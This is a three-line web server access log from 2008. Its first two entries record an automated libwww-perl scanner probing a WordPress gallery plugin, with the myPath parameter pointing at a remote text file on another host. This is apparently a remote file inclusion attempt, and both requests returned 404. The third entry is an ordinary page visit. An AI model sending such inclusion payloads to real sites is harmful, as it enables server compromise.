198.173.255.66 - - [23/May/2008:02:08:21 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://revista.scoalaparintilor.ro//includes//phpmailer/on.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
198.173.255.66 - - [23/May/2008:02:08:21 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://revista.scoalaparintilor.ro//includes//phpmailer/on.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
65.55.165.23 - - [23/May/2008:02:08:28 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://www.ringsworld.com/history/5.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
